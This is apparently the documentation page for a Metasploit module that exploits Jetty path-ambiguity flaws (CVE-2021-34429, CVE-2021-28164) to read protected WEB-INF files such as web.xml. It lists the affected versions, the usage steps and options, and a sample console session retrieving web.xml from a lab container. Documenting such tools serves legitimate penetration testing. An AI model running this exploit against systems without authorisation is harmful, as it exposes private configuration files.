1.8 KiB
1.8 KiB
Vulnerable Application
Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access
protected files in the WEB-INF folder.
Versions effected are:
- 9.4.37.v20210219, 9.4.38.v20210224
- 9.4.37-9.4.42
- 10.0.1-10.0.5
- 11.0.1-11.0.5
Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely
to have information of value.
CVE-2021-34429
Use the Docker image from ColdFusionX at https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml
Verification Steps
- Install Jetty with an app that contains a
WEB-INFfolder - Start msfconsole
- Do:
use auxiliary/gather/jetty_web_inf_disclosure - Do:
set rhosts - Do:
run - You should get the contents of a file
Options
FILE
The file in the WEB-INF folder to retrieve. Defaults to web.xml
CVE
Which vulnerability to use. Options: CVE-2021-34429, CVE-2021-28164. Defaults to CVE-2021-34429
Scenarios
Jetty 11.0.5 from Docker
resource (jetty.rb)> use auxiliary/gather/jetty_web_inf_disclosure
resource (jetty.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (jetty.rb)> set rport 8080
rport => 8080
resource (jetty.rb)> set verbose true
verbose => true
resource (jetty.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version: 11.0.5
[+] 11.0.5 vulnerable to CVE-2021-34429
[!] The service is running, but could not be validated.
[+] File stored to /home/h00die/.msf4/loot/20211108134054_default_1.1.1.1_jetty.web.xml_813220.xml
[+] <!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>